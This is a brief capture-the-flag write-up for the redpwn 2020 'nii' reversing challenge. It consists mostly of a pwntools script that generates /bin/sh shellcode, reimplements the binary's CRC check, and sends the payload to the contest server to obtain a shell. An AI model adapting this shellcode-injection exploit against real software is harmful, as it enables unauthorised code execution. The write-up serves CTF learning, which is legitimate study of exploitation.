The challenge binary had data accepted from stdin that would be executed if inputted properly, and had CRC checks that we had to implement to get code execution.
```py
from pwn import *
import binascii

context.arch = "x86_64"
#context.log_level = 'debug'
shellcode = asm(shellcraft.sh())

edi = 0
for char in shellcode:
itera = 7 #mov cl, 7
while itera >= 0: #cmp cl, 0
r9 = 0 #xor r9, r9
edi2 = edi << 1 #shl edi, 1
if(edi & 0x80000000): #cmovb r9, rax
r9 = 0x80000011 #cmovb r9, rax
r10b_shr = char >> itera #shr r10b, cl
r10b_and = r10b_shr & 1 #and r10b, 1
edi_xor = (r10b_and ^ edi2) & 0xFF #xor dil, r10b
edi2 = (edi2 & 0xFFFFFF00) | edi_xor #xor dil, r10b
edi = edi2 ^ r9 #xor rdi, r9
itera = itera - 1 #dec cl

#p = process("./nii")
p = remote("2020.redpwnc.tf", 31215)
p.sendline(binascii.hexlify((b"NIIv0.1:MaroCart"+p32(edi)+bytes(shellcode))).upper())
p.interactive()
```
The full writeup with explanation of the whole reversing process is here.
[https://www.reversing.tech/2020/07/25/nii-redpwn-2020-OEP.html](https://www.reversing.tech/2020/07/25/nii-redpwn-2020-OEP.html)

Original writeup (https://www.reversing.tech/2020/07/25/nii-redpwn-2020-OEP.html).